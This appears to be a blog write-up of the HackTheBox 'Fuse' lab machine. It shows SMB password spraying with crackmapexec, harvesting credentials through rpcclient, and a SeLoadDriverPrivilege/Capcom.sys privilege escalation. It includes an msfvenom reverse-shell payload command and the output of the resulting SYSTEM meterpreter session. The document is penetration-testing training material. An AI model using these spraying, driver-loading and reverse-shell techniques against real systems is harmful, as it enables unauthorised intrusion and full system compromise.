Hackthebox Fuse writeup –

Hackthebox Fuse writeup -
Hackthebox Fuse writeup -


Hackthebox Fuse writeup -

Steps involved

1-Port scan
2-Enumerating website
3-Making wordlist
4-Changing Password
5-Enumerating printers via rpcclient
6-Getting User flag
7-Exploiting  SeLoadDriverPrivilege
8-Getting root flag

Lessons learned

1-Basic port Scan
2-Making custom word-list via CeWL
3-Changing user password by smbpasswd
4-Enumeration via RPCCLient
5-Exploitation of  SeLoadDriverPrivilege

Commands involved

1-nmap -sC -sV -v -oN nmap
2-cewl -d 5 -m 5 --with-numbers -w docswords.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm
3-crackmapexec smb -u user -p docswords.txt
4-\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys

Port Scan

➜ fuse cat nmap
Nmap 7.80 scan initiated Sat Jun 13 20:14:13 2020 as: nmap -sC -sV -v -oN nmap
Nmap scan report for
Host is up (0.25s latency).
Not shown: 988 filtered ports
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 03:32:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: mean: 5h37m38s, deviation: 4h02m30s, median: 3h17m37s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local | System time: 2020-06-13T20:34:54-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-14T03:34:57
|_ start_date: 2020-06-13T22:06:36

The first service that I check is http. so let’s see what it has.But don’t forget to update your /etc/hosts file.

Hackthebox Fuse writeup -
Here on the website we have three files which contains potential user names .
So let's see and add those to a list.

After a little time I used Cewl tool .To see if I can get some credentials .

➜ fuse cewl -d 5 -m 5 --with-numbers -w docswords.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm

And we got a word list which we can use for brute force.

And here is the potentials user names which I got from CSV files.

➜ fuse cat users

I used crackmapexec for brute forcing .

➜ fuse crackmapexec smb -u user -p docswords.txt
Hackthebox Fuse writeup -

At first I didn’t see anything important in it .But After looking it carefully I found this.

➜  fuse cat tmp | grep Fabricorp01
SMB    445    FUSE             [-] FABRICORP\pmerton:Fabricorp01 STATUS_LOGON_FAILURE 
SMB    445    FUSE             [-] FABRICORP\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB    445    FUSE             [-] FABRICORP\sthompson:Fabricorp01 STATUS_LOGON_FAILURE 
SMB    445    FUSE             [-] FABRICORP\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB    445    FUSE             [-] FABRICORP\administrator:Fabricorp01 STATUS_LOGON_FAILURE 

On the password Fabricorp01 I got password must change .

So for changing the password I used smbpasswd

Hackthebox Fuse writeup -

After changing the password I logged into smb but couldn’t find anything important .So I logged into the rpcclient .

The trick here was that the website we got was related to printers .So I enumerated the information of printers .And found the creds .

Hackthebox Fuse writeup -
Hackthebox Fuse writeup -

After getting the password I logged into the account and got the user flag in it.

Hackthebox Fuse writeup -

For privilege escalation I always start with enumerating the groups and privileges of the user.

Hackthebox Fuse writeup -

SeLoadDriverPrivilege looks interesting so I moved forward with it.

Hackthebox Fuse writeup -

For privilege escalation I followed this article .

The files needed were eoploaddriver.cpp , ExploitCapcom.cpp and capcom.sys

The one change that we had to make was in ExploitCapcom.cpp in the Launchshell ()

static bool LaunchShell() { TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

We needed to edit the path of our payload instead of the default one.

Now let’s create a payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > shell.exe

Then I uploaded it in the test directory because it was written in the readme.txt

Now Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings

*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys [+] Enabling SeLoadDriverPrivilege 
[+] SeLoadDriverPrivilege Enabled 
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService NTSTATUS: 00000000, WinError: 0

And now run the program for final step.

*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe
[*] Capcom.sys exploit 
[*] Capcom.sys handle was obtained as 0000000000000064 [*] Shellcode was placed at 000002B6CF0B0008 
[+] Shellcode was executed 
[+] Token stealing was successful 
[+] The SYSTEM shell was launched 
[*] Press any key to exit this program 
*Evil-WinRM* PS C:\test>

And now let’s see on our multi handler.

msf5 exploit(multi/handler) > run 
[*] Started reverse TCP handler on 
[*] Sending stage (176195 bytes) to 
[*] Meterpreter session 1 opened ( -> at 2020-06-17 02:27:11 -0400 meterpreter > shell 
Process 576 created. Channel 1 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. 

nt authority\system
 C:\test>cd /Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt 
type root.txt 

How useful was this post?

Click on a star to rate it!

Average rating 3.1 / 5. Vote count: 11

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?


No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *